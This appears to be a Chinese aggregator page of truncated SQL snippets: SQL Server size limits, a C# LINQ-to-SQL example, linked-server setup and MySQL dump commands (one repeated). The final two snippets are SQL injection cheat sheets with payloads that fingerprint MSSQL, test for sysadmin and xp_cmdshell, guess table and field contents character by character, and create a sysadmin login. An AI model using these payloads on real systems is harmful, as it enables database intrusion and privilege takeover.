下表说明在 Microsoft SQL Server 数据库中定义的,或在 Transact-SQL
语句中引用的各种对象的最大值(数量或大小)。下表不包含 Microsoft® SQL Server 2000™ Windows® CE 版。
最大值(数量或大小)
对象
SQL Server 7.0
SQL Server 2000
批处理大小
65,536 * 网络数据包大小1
65,536 * 网络数据包大小1
每个短字符串列的字节数
8,000
8,000
每个 text
、ntext
、或 image
列的字节数
2 GB-2
2 GB-2
每个 GROUP BY、ORDER BY的字节数
8,060
每个索引中的字节数
900
9002
每个外键的字节数
900
900
每个主键的字节数
900
900
每行字节数
8,060
8,060
存储过程源文本中的字节数
批处理大小之较小者或者 250 MB
批处理大小之较小者或者 250 MB
每个数据表的聚集索引数
1
1
GROUP BY、ORDER BY 中的列数
只受字节数限制
GROUP BY WITH CUBE 或 WITH ROLLUP 语句中的列数或表达式数目
10
每个索引的列数
16
16
每个外键的列数
16
16
每个主键的列数
16
16
每个基础数据表的列数
1,024
1,024
每个SELECT 语句的列数
4,096
4,096
每个INSERT 语句的列数
1,024
1, ......
private void button2_Click(object sender, EventArgs e)//增
{
try
{
Customers ct = new Customers();
ct.CustomerID = "test";
ct.CompanyName = "test";
NorthwindDataContext nc = new NorthwindDataContext();
nc.Customers.InsertOnSubmit(ct);
nc.SubmitChanges();
MessageBox.Show("更新成功");
}
catch (Exception e1)
{
MessageBox.Show(e1.ToString());
}
}
private void button3_Click(object sender, EventArgs e)//查
{
NorthwindDataContext nt = new NorthwindDataContext();
var a = from s in nt.Customers where s.CustomerID == "test" select new {s.CompanyName,s.ContactName,s.ContactTitle };
foreach (var b in a)
{
MessageBox.Show(b.ToString());
}
}
pr ......
1、在另一台机器上建立独立的数据库服务器,作为链接目标
2、本地数据库服务器上添加“链接服务器”:
名字:随便取一个名字
服务器类型:选择数据源:Microsoft OLE DB Provider for SQL Server
数据源:写别名(在客户端网络实用工具中设置)
选中RPC和RPC输出 ......
mysql导出sql脚本 收藏
注意事项:
*必须在D:\LTSOFT\MYSQL4\bin> mysqldump -u root -p test > c:\a.sql
先得进入mysql安装目录的bin下(可以看到里面有mysqldump.exe),通常mysql默认安装在C:\Program Files\MySQL\MySQL Server 5.0
* 不能进入mysql 命令里.
MySQL导出和导入SQL脚本
1、导出sql脚本
mysqldump -u 用户名 -p 数据库名 > 存放位置
mysqldump -u root -p test > c:\a.sql
(导出sql脚本的以上方法已经经过亲自测试,成功!)
2、导入sql脚本
mysql -u 用户名 -p 数据库名 < 存放位置
mysqljump -u root -p test < c:\a.sql
注意,test数据库必须已经存在
(导入sql脚本的以上方法,测试尚未成功,首先并无mysqljump命令,在bin中也找不到相应的mysqljump.exe
换成了mysqldump来执行,也并未得到预期的结果(预期结果:数据库根据脚本新增了表及数据))
由sql脚本导入数据库选用下面用例的第4种方法。
MySQL导出导入命令的用例
1.导出整个数据库
my ......
mysql导出sql脚本 收藏
注意事项:
*必须在D:\LTSOFT\MYSQL4\bin> mysqldump -u root -p test > c:\a.sql
先得进入mysql安装目录的bin下(可以看到里面有mysqldump.exe),通常mysql默认安装在C:\Program Files\MySQL\MySQL Server 5.0
* 不能进入mysql 命令里.
MySQL导出和导入SQL脚本
1、导出sql脚本
mysqldump -u 用户名 -p 数据库名 > 存放位置
mysqldump -u root -p test > c:\a.sql
(导出sql脚本的以上方法已经经过亲自测试,成功!)
2、导入sql脚本
mysql -u 用户名 -p 数据库名 < 存放位置
mysqljump -u root -p test < c:\a.sql
注意,test数据库必须已经存在
(导入sql脚本的以上方法,测试尚未成功,首先并无mysqljump命令,在bin中也找不到相应的mysqljump.exe
换成了mysqldump来执行,也并未得到预期的结果(预期结果:数据库根据脚本新增了表及数据))
由sql脚本导入数据库选用下面用例的第4种方法。
MySQL导出导入命令的用例
1.导出整个数据库
my ......
and exists (select * from sysobjects) //判断是否是MSSQL
and exists(select * from tableName) //判断某表是否存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员
and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限
and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....
;declare @d int //是否支持多行
and 1=(Select count(*) from master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) from master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活某个服务。 (需要SA权限)
exec master..xp_ ......
SQL手工注入大全
2006年08月11日 星期五 21:00
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多,
看看下面的
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数据库
;and (select Count(*) from [数据库名])>0
7.猜字段
;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER( ......
最新文章 : sql